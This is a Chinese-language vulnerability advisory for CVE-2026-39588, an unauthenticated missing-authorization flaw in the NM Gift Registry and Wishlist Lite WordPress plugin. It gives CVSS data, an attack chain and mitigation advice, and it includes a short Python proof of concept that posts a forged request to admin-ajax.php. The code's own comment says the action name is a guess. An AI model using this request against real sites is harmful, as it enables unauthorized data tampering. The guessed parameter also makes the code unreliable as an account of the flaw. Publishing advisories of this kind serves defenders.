CVE-2026-39588 CVSS 5.3 中危

CVE-2026-39588 NM Gift Registry缺失授权漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39588

漏洞类型

访问控制缺失

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NM Gift Registry and Wishlist Lite

漏洞概述

NM Gift Registry and Wishlist Lite WordPress插件在5.13及以下版本中存在严重的缺失授权漏洞。由于未能正确配置访问控制安全级别，未经身份验证的远程攻击者可利用此漏洞执行本应受限的操作，导致系统数据完整性受损。

技术细节

该漏洞源于插件在处理特定功能请求时，未对用户身份进行严格的权限校验。根据CVSS向量分析，攻击复杂度低且无需用户权限。攻击者可通过网络向易受攻击的端点（如AJAX处理接口）发送特制HTTP请求。由于缺乏授权检查，服务器会误将请求视为合法操作并执行，从而允许攻击者篡改数据或进行未授权操作。

攻击链分析

STEP 1

信息收集

攻击者通过网络扫描识别使用WordPress的网站，并确认其安装了NM Gift Registry and Wishlist Lite插件。

STEP 2

漏洞探测

攻击者向目标站点发送未授权的探测请求，测试插件端点是否存在权限校验缺失的情况。

STEP 3

漏洞利用

发送特制的恶意数据包至漏洞端点，绕过身份验证直接修改后台数据或执行受限功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_missing_auth(target_url):
    """
    PoC for CVE-2026-39588: Missing Authorization in NM Gift Registry
    This script attempts to add an item to the registry without authentication.
    """
    # The vulnerable endpoint is typically wp-admin/admin-ajax.php
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Example payload structure based on 'Exploiting Incorrectly Configured Access Control'
    # The specific action parameter needs to be discovered via source code analysis
    payload = {
        "action": "nm_gr_add_to_registry", 
        "product_id": "1",
        "quantity": "999"
    }

    try:
        response = requests.post(ajax_url, data=payload, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {target_url}")
            print(f"[+] Response: {response.text[:100]}")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    exploit_missing_auth(target)

影响范围

NM Gift Registry and Wishlist Lite <= 5.13

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用该插件以阻断攻击路径。同时，应监控服务器日志，检查是否存在针对该插件API的异常未授权访问记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表